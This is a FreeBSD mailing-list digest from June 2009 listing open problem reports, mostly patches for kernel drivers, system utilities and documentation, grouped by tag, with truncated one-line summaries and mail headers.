[uma] [patch] minor optimization to uma o gnu/85895 [patch] cc -print-search-dirs returns (null) o kern/85886 [an] [patch] an0: timeouts with Cisco 350 minipci o conf/85819 rc [patch] script allowing multiuser mode in spite of fsc s kern/85658 jeff [sched_ule] [patch] add DDB command, show runq, to sch o kern/85657 [kernel] [patch] capture and expose per-CPU time accou o i386/85656 i386 [i386] [patch] expose more i386 specific CPU informati o i386/85655 i386 [i386] [patch] expose cpu info for i386 systems o i386/85653 i386 [i386] [patch] relieve hangs in tight loops in process o i386/85652 i386 [loader] [patch] deal with out-of-memory errors during o kern/85651 [kernel] [patch] debugging code to show entries in eve o kern/85650 [libstand] [patch] modifications to tftp-based PXE boo o kern/85493 imp [ed] [patch] OLDCARD can't probe ed driver o i386/85417 i386 [i386] [npx] [patch] Possible bug in ia32 floating-poi p kern/85320 gonzo [gre] [patch] possible depletion of kernel stack in ip o kern/85266 net [xe] [patch] xe(4) driver does not recognise Xircom XE o kern/85137 des [pseudofs] [patch] panic due to sleep with held mutex o docs/85128 doc [patch] loader.conf(5) autoboot_delay incompletly desc o kern/85086 wkoszek [ef] [patch] Locking fixes for ef(4) (+removes mem. le o kern/84981 [headers] [patch] header protection for with aroun p kern/78179 alc [vm] [patch] bus_dmamem_alloc() with BUS_DMA_NOWAIT ca o bin/78170 [patch] Fix signal handler in bootpd(8) o kern/78114 phk [geom] [patch] Solaris/x86 label structures for GEOM ( p kern/77913 net [wi] [patch] Add the APDL-325 WLAN pccard to wi(4) o kern/77355 [i386] [patch] Detect i*86 subarches for uname s kern/77195 net [ipf] [patch] ipfilter ioctl SIOCGNATL does not match o kern/77181 mckusick [newfs] [patch] newfs -g largevalue, mkdir, panic o bin/77031 [patch] comm(1) unable to handle lines greater than LI o i386/76944 i386 [busdma] [patch] i386 bus_dmamap_create() bug o kern/76893 [cam] [patch] Fatal divide in booting processes with B o bin/76711 [patch] rm(1): parse error in rm.c:check() while parsi o kern/76678 dfr [libpam] [patch] Allow pam_krb5 to authenticate no loc o usb/76653 usb [umass] [patch] Problem with Asahi Optical usb device o conf/76626 [patch] 460.status-mail-rejects shows destination doma o kern/76539 [dummynet] [patch] ipnat + dummynet on output on same s kern/76520 [libiconv] [patch] Add new kernel-side libiconv conver o bin/76362 [patch] sys directory link points to wrong location p docs/76333 trhodes [patch] ferror(3): EOF indicator can be cleared by not o gnu/76169 [patch] Add PAM support to cvs pserver o kern/76126 [nfs] [patch] 4.11 client will send a NFS request to r o kern/75934 [libcrypt] [patch] missing blowfish functionality in p o usb/75764 usb [umass] [patch] "umass0: Phase Error" - no device for o docs/75711 keramida [patch] opendir(3) missing ERRORS section o bin/75258 [patch] dd(1) has not async signal safe interrupt hand o kern/75132 jhb [puc] [patch] add support for the Davicom 56PDV PCI Mo o kern/75122 silby [netinet] [patch] Incorrect inflight bandwidth calcula s kern/74986 jfv [patch] sysctlize a parameter of if_em's interrupt mod o kern/74786 [irq] [patch] Smartlink Modem causes interrupt storm o s usb/74453 usb [umass] [patch] Q-lity CD-RW USB ECW-043 (ScanLogic SL o kern/74450 [libalias] [patch] enable libalias/natd to create skip o bin/74360 [patch] ndiscvt(8) generates a driver which doesn't ma o conf/74213 darrenr [patch] Connect src/etc/periodic/security/610.ipf6deni o bin/74178 [patch] grdc(6) - scrolling does not work and "AM"/"PM o bin/74127 [patch] patch(1) may misapply hunks with too little co o conf/74004 [patch] add fam support to inetd.conf o i386/73921 i386 [sysctl] [patch] sysctlbyname for machdep.tsc_freq doe o conf/73786 [patch] added WARNING in spanish to stable-supfile o kern/73777 emulation [linux] [patch] linux emulation: root dir special hand o conf/73677 rc [patch] add support for powernow states to power_profi o conf/73337 [nsswitch.conf] [patch] potential invalid free o kern/73328 edwin [patch] top(1) shows NICE as -111 on processes started o kern/73004 [loader] [patch] PXE loader malfunction in multiple PX o conf/72901 [patch]: dot.profile: prevent printing when doing an s o bin/72793 [patch] wicontrol(8) prints out non-printable chars in o bin/72588 [patch] iostat(8) tty stats field concatenation o kern/72585 [syscons] [patch] iso05-8x16.fnt lacks letter q o conf/72465 [patch] United States International keyboard layout fo o kern/72433 [amr] [patch] AMR raid, amrreg.h struct amr_enquery3 a o conf/72277 [patch] update for /usr/share/skel o conf/71994 [patch] dot.login: login shell may unnecessarily print s bin/71855 [patch] making kdump(1) WARNS=6 clean o bin/71749 [patch] truss -f causes circular wait when traced proc o bin/71671 [patch] cleanup of the usr.sbin/apmd code o bin/71667 [patch] cleanup of the usr.sbin/bootparamd code o bin/71665 [patch] cleanup of the usr.sbin/dconschat code o bin/71664 [patch] cleanup of the usr.sbin/fwcontrol code o bin/71661 [patch] cleanup of the usr.sbin/keyserv code o bin/71660 [patch] cleanup of the usr.sbin/kgmon code p bin/71659 [patch] cleanup of the usr.sbin/mount_portalfs code o bin/71632 [patch] cleanup of the usr.sbin/ndp code o bin/71631 [patch] cleanup of the usr.sbin/pppctl code o bin/71630 [patch] cleanup of the usr.sbin/pppd code o bin/71629 [patch] cleanup of the usr.sbin/pppstats code o bin/71628 [patch] cleanup of the usr.sbin/rpcbind code o bin/71625 [patch] [nis] cleanup of the usr.sbin/rpc.ypupdated co o bin/71622 [patch] sicontrol(8): cleanup of the usr.sbin/sicontro o bin/71621 [patch] sliplogin(8): cleanup of the usr.sbin/sliplogi o bin/71618 [patch] timed(8): cleanup of the usr.sbin/timed code o bin/71617 [patch] [nis] ypserv(8): cleanup of the usr.sbin/ypser o bin/71616 [patch] [nis] yp_mkdb(8): cleanup of the usr.sbin/yp_m o bin/71613 [patch] traceroute(8): cleanup of the usr.sbin/tracero o bin/71602 [patch] uninitialized "len" used instead of "slen" wit s bin/71290 des [patch] passwd(1) cannot change passwords other than N o kern/71258 alc [vm] [patch] anonymous mmappings not always page align o stand/70813 standards [patch] ls(1) not Posix compliant o kern/70810 [pci] [patch] Enable SMBus device on Asus P4B series m o i386/70531 i386 [boot0] [patch] boot0 hides Lilo in extended slice o usb/70523 usb [umct] [patch] umct sending/receiving wrong characters o bin/70245 ru [patch] [build] Change to src/release/Makefile to aid p kern/70096 trhodes [msdosfs] [patch] full msdos file system causes corrup o bin/69986 sysinstall(8): [patch] no job control in fixit shell o o bin/69875 [patch] mlxcontrol(8): `mlxcontrol status ' p docs/69861 trhodes [patch] usr.bin/csplit/csplit.1 does not document POSI o kern/69650 [patch] make getserv* functions work with nsdispatch o bin/69398 [patch] login(1) cleartext display of password in logi o bin/69268 [patch] Fix ndiscvt(8) to warn you if it's going to ge o bin/69083 [patch] vi(1) basic modelines for contrib/nvi o bin/69010 [patch] [build] Portability fixes for FreeBSD build ut o usb/69006 usb [usbdevs] [patch] Apple Cinema Display hangs USB ports a kern/68905 secteam [patch] core dumps are assigned wrong ownership o bin/68797 [patch] cut(1): fflush after each write if an option i o bin/68586 dwmalone [patch] allow syslogd(8) to forward to non-default por o bin/68437 [patch] conscontrol(8) DEVDIR -> _PATH_DEV fix and mor o bin/68328 [patch] syslogd(8) enable configuration of extra liste s kern/68317 [kernel] [patch] on soft (clean) reboots clean dmesg o o kern/68311 [patch] it is impossible to override defaults with ker o usb/68232 usb [ugen] [patch] ugen(4) isochronous handling correction p kern/68189 bz [arp] [jail] [patch] arp -a discloses non-jail interfa o conf/68108 [patch] Adding mac-address /conf selector to diskless o kern/67830 [smp] [patch] CPU affinity problem with forked child p o bin/67550 [patch] tftpd(8) Add BLK_SIZE option to tftpd server f ports/67436 portmgr [patch] bsd.port.mk: GNU_CONFIGURE_PREFIX_SUBDIR s i386/67383 [i386] [patch] do a better job disassembling code in 1 o bin/67231 [patch] pam_krb5 doesn't honor default flags from /etc o bin/66988 [patch] apm(8) check validation of the returned values o kern/66960 [fdc] [patch] filesystems not unmounted during reboot o bin/66893 [patch] [nis] rpc.yppasswdd(8): Linux NIS clients conn s ports/66566 portmgr [PATCH] bsd.port.mk: fix build when /usr/obj/usr/ports s ports/66342 portmgr [PATCH] fix ECHO_MSG breakage in java ports p docs/66289 brueffer [patch] lib/libc/gen/ualarm.3 refers to non-existent a o kern/66268 glebius [socket] [patch] Socket buffer resource limit (RLIMIT_ o kern/66225 [netgraph] [patch] extend ng_eiface(4) control message o kern/66029 [crypto] [patch] MD5 alignment problem on a TriMedia p o kern/65901 fs [smbfs] [patch] smbfs fails fsx write/truncate-down/tr s ports/65804 portmgr [PATCH] bsd.port.mk is gratuitously slow o bin/65803 gad [patch] ps(1) enhancements (posix syntax, and more) o kern/65355 [pci] [patch] TC1000 serial ports need enabling o bin/65306 obrien [patch] [build] Portability fixes for FreeBSD build ut o bin/65228 [Patch] Allow rup(1) to parse hostnames from a defined s kern/64875 standards [libc] [patch] [request] add a system call: fdatasync( a kern/64816 [nfs] [patch] mmap and/or ftruncate does not work corr o bin/64327 [patch] make(1): document surprising behaviour of assi o kern/64196 [kernel] [patch] remove the arbitrary MAXSHELLCMDLEN o kern/64178 jmg [kqueue] [patch] kqueue does not work with bpf when us o kern/64114 [vga] [patch] bad vertical refresh for console using R o kern/63863 glebius [netgraph] [patch] [request] implement NGM_ELECTROCUTE f usb/63837 linimon [uhid] [patch] USB: hid_is_collection() only looks for o docs/63570 doc [patch] Language cleanup for the Handbook's DNS sectio a bin/63197 [patch] tftp(1) Bus error, core dumped o kern/63064 [patch] strptime(3) fails on %z a kern/62278 [nfs] [patch] NFS server may not set eof flag when rea o bin/62077 [patch] Make it possible to abbreviate mixer(8) device o i386/62003 remko [loader] [patch] make /boot/loader "reboot" code same o bin/61978 delphij [patch] sync setkey(8) token.l with KAME f kern/61960 linimon [ata] [patch] BigDrive support for PC-98 architecture a kern/61744 andre [netinet] [patch] TCP hangs onto mbufs with no tcp dat s kern/61497 ups [kernel] [patch] __elfN(map_insert) bug s i386/61481 [patch] a mechanism to wire io-channel-check to userla s misc/61322 [build] [patch] bsd.dep.mk disallows shell generated f o docs/61301 doc [patch] Manpage patch for aue(4) to enable HomePNA fun o kern/61300 [aue] [patch] Enabling HomePNA PHY on aue(4) for HomeP o bin/61239 [patch] bootp enhancement, places the dhcp tags into t o kern/60963 [pecoff] [patch] Win32 Applications abort on PECOFF o bin/60892 [patch] added -p option to kldxref(8) to allow creatio o bin/60834 [patch] ftpd(8) send_data()+oldway: anonymous transfer o kern/60697 [pty] [patch] pseudo-tty hack versus telnet race cause o kern/60677 multimedia [sound] [patch] No reaction of volume controy key on I s ports/60558 portmgr [PATCH] bsd.port.mk: automatically verify GnuPG signat o kern/60550 silby [kernel] [patch] hitting process limits produces sub-o p kern/60307 [pccard] [patch] wrong product id in pccarddevs for Sp s kern/60293 net [patch] FreeBSD arp poison patch o kern/59903 [pci] [patch] "pci_find_device" returns [only/at] the o bin/59777 [patch] ftpd(8)/FreeBSD 5: potential username enumerat o bin/59775 [patch] ftpd(8)/FreeBSD 5: incorrect reply for "unimpl o bin/59774 [patch] ftpd(8)/FreeBSD 5: syslog facility may be chan o bin/59772 [patch] ftpd(8)/FreeBSD 5: support for tcp_wrappers in o docs/59735 kensmith [patch] Adding a reference to Icelandic Rsync to mirro o bin/59708 sysinstall(8): [patch] add sSMTP support for Mail sele o usb/59698 usb [keyboard] [patch] Rework of ukbd HID to AT code trans o conf/59600 [patch] Improved us.emacs.kbd mapping o bin/59564 [patch] from(1) add option (-S) to also display subjec o www/59307 remko [patch] xml/xsl'ify & update publications page o kern/59289 [bktr] [patch] ioctl METEORGBRIG in bktr_core.c forget o docs/59240 blackend [patch] handbook update: linux MATLAB o bin/59220 obrien [patch] systat(1) device select (:only) broken o docs/59044 doc [patch] doc.docbook.mk does not properly handle a sour o conf/58939 rc [patch] dumb little hack for /etc/rc.firewall{,6} o kern/58803 [kernel] [patch] kern.argmax isn't changeable even at p kern/58687 deischen [libc] [patch] gethostbyname(3) leaks kqueue file desc o bin/58483 [patch] mount(8): allow type special or node relative o bin/58012 [patch] tftpd(8) Multihomed tftpd enhancement o bin/57715 [patch] tcopy(1) enhancement o kern/57631 jhb [agp] [patch] boot failing for ALi chipsets o kern/57522 [patch] New PID allocater algorithm from NetBSD o conf/57517 [patch] add parameter for /etc/periodic/daily/210.back s bin/57407 [patch] Better NTP support for dhclient(8) and friends o docs/57298 blackend [patch] add using compact flash cards info to handbook s bin/57255 usb [patch] usbd(8) and multi-function devices s amd64/57250 kmacy [amd64] [patch] Broken PTRACE_GETFPREGS and PTRACE_SET s bin/57088 [cam] [patch] for a possible fd leak in libcam.c s bin/57018 [patch] convert growfs(8) to use libufs(3) o conf/56934 rc [patch] rc.firewall rules for natd expect an interface o bin/56648 [patch] enable rcorder(8) to use a directory for locat o bin/56447 [patch] extend mt(1) command for AIT-2 tape drives o kern/56250 [ums] [patch] ums(4) doesn't work with MCT based PS/2 o kern/55984 ipfw [ipfw] [patch] time based firewalling support for ipfw o docs/55883 kensmith [patch] handbook advanced-networking/chapter.sgml s ports/55841 portmgr [patch] Mk/bsd.port.mk: add routines to use ${PORTSDIR a kern/55542 andre [de] [patch] discard oversize frame (ether type 800 fl o bin/55539 [patch] Parse fstab(5) with spaces in path names o misc/55387 [build] [patch] users LD_LIBRARY_PATH can interfere wi p kern/55018 andre [digi] [patch] Digiboard PC/Xem fails to initialize wh o conf/55015 [patch] 700.kernelmsg: Security check output enhacemen o kern/54891 [libalias] [patch] libalias(3)/natd(8) and exporting c o kern/54604 pjd [kernel] [patch] make 'ps -e' procfs-independent o bin/54594 [patch] make(1) apply regexps to the entire variable - o docs/54461 kensmith [patch] Possible additions to Handbook (Basics and Use p bin/54446 flz [patch] pkg_delete(1) doesn't honour symlinks, portupg o kern/54439 [sysctl] [patch] Protecting sysctls variables by given o bin/54401 [patch] pppstats(8) prints 0 for absolute values in ra o kern/54383 net [nfs] [patch] NFS root configurations without dynamic o bin/54365 [patch] add -u option to install(1) for SysV compatibi o conf/54170 [patch] error from weekly periodic script 330.catman s stand/53682 [feature request] [patch] add fuser(1) utility o bin/53341 sysinstall(8): [patch] dump frequency in sysinstall is f kern/52980 mbr [dc] [patch] dc driver fails to init Intel 21143 Cardb s ports/52765 portmgr [patch] Uncompressing manual pages may fail due too "a o kern/52725 [patch] installincludes for kmods s ports/52706 portmgr [patch] bsd.port.mk issues warning if a site is explic o kern/52623 [ex] [patch] IRQ error in driver for the Intel EtherEx s docs/52071 delphij [patch] Add more information about soft updates into a s usb/51958 usb [urio] [patch] update for urio driver o kern/51583 fs [nullfs] [patch] allow to work with devices and socket s kern/51341 remko [ipfw] [patch] ipfw rule 'deny icmp from any to any ic o kern/51274 ipfw [ipfw] [patch] ipfw2 create dynamic rules with parent o ports/51152 portmgr [patch] bsd.port.mk: generic SHEBANG_FILES o bin/51148 [patch] Control the cache size for pwd_mkdb(8) to spee s bin/51137 [patch] config(8) should check if a scheduler is selec o bin/51070 [patch] add -p option to pom(6) o kern/51009 [aue] [patch] buggy aue driver fixed. s kern/50827 [kernel] [patch] [request] add sane record locking o docs/50773 jmg [patch] NFS problems by jumbo frames to mention in bge o kern/50526 [kernel] [patch] update to #! line termination o kern/50310 [libalias] [patch] natd / libalias fix to allow dcc re o bin/50300 [patch] make the loader(8) use of terminal-control seq o docs/50211 doc [patch] doc.docbook.mk: fix textfile creation o misc/50106 [build] [patch] make 'make release' more flexible behi o kern/49039 [sio] [patch] add support for RS485 hardware where dir a bin/49023 gad [patch] to lpd(8) (printjob.c) to pass source filename s bin/48962 des [patch] modify fetch(1) to allow bandwidth limiting p bin/48730 obrien [patch] burncd(8) does not handle signals and causes d o gnu/48638 [libdialog] [patch] some bug fixes in libdialog o bin/48603 [patch] getopt(1) is broken o kern/48599 [syscons] [patch] syscons cut-n-paste logic is broken o kern/48471 pjd [jail] [patch] [request] private IPC for every jail o conf/48444 [patch] security.functions: count connection attempts o bin/48443 mtm [patch] periodic(8) executes too many files o conf/48325 [patch] /etc/periodic/security/100.chksetuid doesn't w o bin/48183 marcel [patch] gdb(1) on a core(5)-file from a threaded proce o kern/48172 ipfw [ipfw] [patch] ipfw does not log size and flags o conf/48133 [patch] /etc/rc: improved vi recovery notification o docs/48101 doc [patch] add documentation on the fixit disk to the FAQ p docs/47818 trhodes [patch] ln(1) manpage is confusing o bin/47815 [patch] stty(1) -all should work. o docs/47594 remko [patch] passwd(5) incorrectly states allowed username o bin/47576 edwin [patch] factor(6)ing of negative numbers o conf/47566 [vinum] [patch] add vinum status verification to perio o bin/47540 [patch] Make natd(8) configurable in running state wit o kern/46973 [syscons] [patch] [request] syscons virtual terminals o bin/46888 gad [patch] Add script run hook to newsyslog(8) o bin/46758 [patch] moused(8) enhancements o bin/46676 ru [patch] [build] bsd.dep.mk restricts domain of tags co o bin/46352 [patch] login(1) open file descriptors and signal hand o bin/46328 gad [patch] patch for lpd(8) o kern/46159 ipfw [ipfw] [patch] [request] ipfw dynamic rules lifetime f o kern/45729 [libexec] [patch] make rbootd transfer the default fil o conf/45704 [patch] request to change cp866b font to cp866 s bin/45547 [patch] make burncd(8) handle .wav files. o bin/45529 gcooper [patch] hexdump(1) core-dumps with certain args o bin/45333 [patch] New option -r for chown(8) and chgrp(1) o conf/45226 rc [patch] Fix for rc.network, ppp-user annoyance o conf/45222 [patch] daily rejected mail hosts report too long p bin/45193 [patch] truss(1) can't truss itself o docs/45011 trhodes [patch] style(9): '->' and '.' don't require spaces o gnu/44984 bugmeister [patch] send-pr(1) can use environmental variable $FRO o conf/44717 [patch] update login.conf and unify login capabilities o gnu/44564 peter [patch] Aborted cvs session causes an endless loop in o kern/44365 [headers] [patch] introduce ulong and unchar types o kern/44267 [sio] [patch] One more modem PNP id for /usr/src/sys/i o kern/44202 [rp] [patch] -stable rp driver does not work with mult o conf/44170 rc [patch] Add ability to run multiple pppoed(8) on start o kern/43905 jmg [kqueue] [patch] kqueues: EV_SET(kevp++, ...) is non-i o docs/43823 doc [patch] update to environ(7) manpage o bin/43819 [patch] changed truss(1) output for utrace calls o kern/43716 [puc] [patch] puc driver does not recognize Lava Dual- o kern/43616 [zlib] [patch] static-ize some functions in sys/net/zl o kern/43611 [crypto] [patch] static-ize some symbols in sys/crypto o bin/43582 [patch] passwd(1) fails on nonexistent users o kern/43577 [kernel] [patch] [request] new kernel option SHUTDOWN_ o conf/43500 [patch] rc.syscons "allscreens" improvements o bin/43434 [patch] new option to dmesg(8) which allows to display o bin/42974 [patch] syslogd(8): add ISO 8601 date format option o kern/42429 [libc] [patch] hash_action called with HASH_DELETE doe o kern/42422 [libc] [patch] dbm_delete returns -1 instead of 1 when o kern/42387 [librpcsvc] [patch] cleaning code of librpcsvc from wa o kern/42386 [libkvm] [patch] cleaning code from warnings in libkvm o bin/42336 [patch] ISO-fication of /usr/src/contrib/tcp_wrappers: o kern/42274 [kernel] [patch] Convert defined variable into tuneabl o misc/42115 luigi [picobsd] [patch] fix build script for 4.6-STABLE s bin/41947 gcooper [patch] hexdump(1) unprintable ASCII enhancement o docs/41879 hrs [patch] cleanup to DOCROOT/share/sgml/freebsd.dsl o docs/41824 murray [patch] LANG is not documented in setlocale(3) o bin/41817 [patch] pw(8): pw groupshow doesn't include the login o conf/41777 [patch] /etc/periodic/daily/100.clean-disks removes li o bin/41674 [patch] iostat(8) column formatting overlaps a bin/41583 [patch] mtree(8) assorted mtree bugs o bin/41556 obrien [patch] wtmp patch for ftpd(8) o kern/41543 emulation [patch] [request] easier wine/w23 support o kern/41307 [libalias] [patch] logging of links lifecycle (add/del o bin/41271 matteo [patch] non-suid crontab(1) o bin/41190 [patch] sed(1) report the { linenum instead of EOF lin o bin/41159 [patch] new sed(1) -c option to allow ; as a separator o conf/40777 [patch] disktab does not support 2.88MB floppies o bin/40597 [patch] add fdisk(8) ability of showing extended parti o kern/40369 [kernel] [patch] rman_reserve_resource - when "count > a bin/40282 [patch] kill(1) has bad error checking for command lin s kern/40021 [build] [patch] use ld(1) to build kernel with linked- o kern/40017 [patch] allows config(8) to specify config metadata di s threa/39922 threads [threads] [patch] Threaded applications executed with o kern/39681 [sysctl] [patch] add hidden kernel boot tunables to sy o ports/39660 portmgr [patch] add ${PKGNAMEPREFIX} to (DOCS|EXAMPLES)DIR o conf/39505 [patch] automate BUILDNAME variable for releases o bin/39463 mtm [patch] Add several options to fingerd(8) o kern/39252 [syscons] [patch] syscons doesn't support 8-bit contro o kern/39201 emulation [linux] [patch] ptrace(2) and rfork(RFLINUXTHPN) confu o docs/38982 doc [patch] developers-handbook/Jail fix o bin/38727 [patch] mptable(1) should complain about garbage argum a kern/38554 net [patch] changing interface ipaddress doesn't seem to w s kern/38347 [libutil] [patch] [request] new library function abs2r o bin/38256 [patch] linking pax(1) to pax_{cpio|tar} o bin/38168 [patch] [request] installing curses-based versions of o docs/38061 ume [patch] typos in man pages for faith(4) & faithd(8) o gnu/37910 bugmeister [patch] make send-pr(1) respect &'s in /etc/{master.}p o bin/37844 [patch] [build] make knob to not install progs with su o conf/37569 matteo [patch] Extend fstab(5) format to allow for spaces in o kern/37555 [kernel] [patch] vnode flags appear to be changed in n o kern/37554 jmg [vm] [patch] make ELF shared libraries immutable once o i386/37523 davidxu [i386] [patch] lock for bios16 call and vm86call o bin/37442 [patch] sleep(1) to support time multipliers s kern/37441 davidxu [isa] [patch] ISA PNP parse problem o bin/37437 [patch] [request] Add HTTP-style support to vis(1)/unv o bin/37083 [patch] [request] small improvement to talk(1): add cl o bin/37013 [patch] ls(1) directory name output trailing slash dup o gnu/36926 bugmeister [patch] send-pr destroys PR if emacs interrupt charact o kern/36916 randi [libdisk] [patch] DOS active partition flag lost in li o kern/36902 [libc] [patch] proposed new format code %N for strftim o bin/36556 [patch] regular expressions for tcpwrappers o bin/36553 gad [patch] [request] Two new features in newsyslog(8) a kern/36451 [bktr] [patch] Japan IF frequency is incorrect o kern/36415 [bktr] [patch] driver incorrectly handles the setting o bin/36374 [patch] apmd(8): fix core dumps, other improvements o bin/36262 [patch] Fixed rusers(1) idle-time reporting to use min o kern/36170 [an] [patch] an(4) does an_init() even if interface is o bin/36143 [patch] moused(8): add dynamic (non linear) mouse acce o bin/35886 [patch] pax(1) enhancement: custom time format for lis o conf/35545 [patch] enhanced periodic scripts: 100.clean-disks, 10 o misc/35542 bde [build] [patch] BDECFLAGS needs -U__STRICT_ANSI__ o kern/35442 net [sis] [patch] Problem transmitting runts in if_sis dri o kern/35289 [bktr] [patch] Brooktree device doesnt properly signal o kern/35262 [boot2] [patch] generation of boot block for headless o bin/35113 [patch] grdc(6) enhancement: countdown timer mode o bin/35109 edwin [patch] morse(6) add ability to decode morse code o kern/34842 [nis] [patch] VmWare port + NIS causes "broadcast stor o bin/34628 portmgr [patch] pkg_add(1) pkg-routines ignore the recorded md o bin/34412 [patch] tftp(1) will still try and receive traffic eve o kern/33965 [keyboard] [patch] programmable keys of the keyboard ( o bin/33809 mux [patch] mount_nfs(8) has trouble with embedded ':' in o bin/33774 [patch] for killall(1) s docs/33589 doc [patch] to doc.docbook.mk to post process .tex files. o bin/32808 dwmalone [patch] tcpd.h lacks prototype for hosts_ctl s threa/32295 threads [libc_r] [patch] pthread(3) dont dequeue signals o bin/31987 [patch] allow dump(1) to notify operators by mail(1) o kern/31981 [libc] [patch] (mis)feature in getnetent parsing -- co o kern/31890 [syscons] [patch] new syscons font s bin/31304 [patch] fix crunchgen(1) to work with more contrib-kin o kern/31201 [libdisk] [patch] add free_space(chunk) to libdisk o conf/30938 [patch] Improving behavior of /etc/periodic/daily/110. o usb/30929 usb [usb] [patch] use usbd to initialize USB ADSL modem o conf/30812 [patch] giant termcap database update o bin/30654 gad [patch] Added ability for newsyslog(8) to archive logs o bin/30542 [patch] add -q option to shut up killall(1) o conf/30399 brueffer [bsd.cpu.mk] [patch] Have Fortran use the CPUTYPE vari o kern/30321 [patch] strftime(3) '%s' format does not work properly o kern/30052 mbr [dc] [patch] dc driver queues outgoing pkts indefinite a docs/30008 doc [patch] French softupdates document should be translat o bin/29897 des [patch] pam_unix(8) loginclass passwd_prompt o kern/29698 emulation [linux] [patch] linux ipcs doesn'work s kern/29423 [request] [patch] new feature: kernel security hooks i o bin/29363 gad [patch] newsyslog(8) can support time as extension o kern/29355 mux [kernel] [patch] add lchflags support s bin/29292 [patch] addition to burncd(8) for specific handling of o bin/28364 [patch] flex(1) generated files fail to compile cleanl o conf/28236 [patch] iso-8859-1_to_cp437.scm doesn't contain some u o docs/27605 doc [patch] Cross-document references () o bin/27306 marcel [patch] hw watchpoints work unreliable under gdb(1) o kern/26787 [patch] sysctl change request o kern/26562 [lpt] [patch] /dev/lpt0 returns EBUSY when attempting o bin/26486 remko [libc] [patch] setnetgrent hangs when netgroup contain s bin/25477 [pam] [patch] pam_radius(8) fix to allow null password f kern/24959 kmacy [patch] proper TCP_NOPUSH/TCP_CORK compatibility o bin/24485 [patch] to make cron(8) handle clock jumps o kern/24435 [libdisk] [patch] changing slice type causes Auto-part o bin/23562 markm [patch] telnetd(8) doesn't show message in file specif o kern/23546 multimedia [snd_csa] [patch] csa DMA-interrupt problem a bin/23254 [patch] yacc(1) accepts bad grammer o bin/23098 sysinstall(8): [patch] if installing on a serial conso o conf/23063 net [arp] [patch] for static ARP tables in rc.network s i386/22944 alc [vm] [patch] isa_dmainit fails on machines with 512MB s kern/22417 gibbs [adw] [patch] advansys wide scsi driver does not suppo o kern/21998 kmacy [socket] [patch] ident only for outgoing connections a kern/21807 trhodes [msdosfs] [patch] Make System attribute correspond to o conf/21675 [patch] Better and more disktab entries for MO drives a bin/21089 [patch] vi(1) silently corrupts open file on SIGINT wh o bin/20501 [patch] dump(8) extra flag to dump to offline autoload o bin/19837 ambrisko sysinstall(8): [patch] run Fix It floppy from serial p s bin/19773 markm [patch] telnet(1) infinite loop depending on how fds a s kern/19535 [procfs] [patch] procfs_rlimit tidyup o kern/18293 [psm] [patch] lack of versapad mouse wheel emulation o kern/18271 [patch] simplelock: klds not portable across UP and SM o bin/18100 [patch] update to src/usr.bin/from/from.c for multiple o kern/17504 [cam] [patch] Another Micropolis Synchronize Cache Pro o kern/17425 [ppbus] [patch] fix two small printing errors in ppbus o bin/17289 gad [patch] wrong permissions on /var/run/printer o kern/16644 dwmalone [bpf] [patch] Bad comparison expression in bpf_filter. o kern/15838 trhodes [msdosfs] [patch] Conversion tables in msdosfs_conv.c o bin/15619 peter [patch] standard pppd(8) doesn't authenticate users wi o bin/15205 [patch] Addition to random(6) o bin/15168 [patch] Adding tracklist support to fdformat(1) p conf/15010 keramida [patch] rc.firewall: "client" firewall configuration k s kern/13997 rwatson [jail] [patch] RLIMIT_NPROC works unadequately for jai f kern/13326 kmacy [headers] [patch] additional timeval interfaces for Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 9A11910656E0 for ; Mon, 22 Jun 2009 11:13:01 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 811E98FC1C for ; Mon, 22 Jun 2009 11:13:01 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MBD1pd028274 for ; Mon, 22 Jun 2009 11:13:01 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MB8iAG020078 for freebsd-bugs@FreeBSD.org; Mon, 22 Jun 2009 11:08:44 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 22 Jun 2009 11:08:44 GMT Message-Id: <200906221108.n5MB8iAG020078@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: gnats set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Cc: Subject: Current problem reports sorted by tag X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 11:13:06 -0000 (Note: a better version of this report is available at http://people.freebsd.org/~linimon/studies/prs/pr_tag_index.html .) Problem reports for tag '2tb': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/118912 fs [2tb] disk sizing/geometry problem with large array s bin/111146 fs [2tb] fsck(8) fails on 6T filesystem o bin/107829 fs [2TB] fdisk(8): invalid boundary checking in fdisk / w o kern/84589 fs [2TB] 5.4-STABLE unresponsive during background fsck 2 o kern/79251 geom [2TB] newfs fails on 2.6TB gbde device o kern/18874 fs [2TB] 32bit NFS servers export wrong negative values t 6 problems total. Problem reports for tag 'aac': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135408 [aac] Adaptec 5405 RAID controller hanging under high o kern/128165 [aac] [patch] sync aac(4) with the latest vendor versi o kern/126697 emaste [aac] aac driver bug. aaccli still doesn't work o kern/123666 scsi [aac] attach fails with Adaptec SAS RAID 3805 controll o kern/103615 emaste [aac] [patch] aac(4) update to the last version availa o kern/91910 scottl [aac] [regression] aac driver hangs on Dell PE800 with 6 problems total. Problem reports for tag 'acd': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/133253 i386 [acd] Error mounting install image 1 problem total. Problem reports for tag 'acl': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/110915 rwatson [acl] ACL's don't work with SUIDDIR o kern/58941 rwatson [acl] acl under ufs2 doesn't handle disk corruption, p 2 problems total. Problem reports for tag 'acpi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135070 acpi [acpi] [patch] BIOS resource allocation and FreeBSD AC o kern/132602 acpi [acpi] ACPI Problem 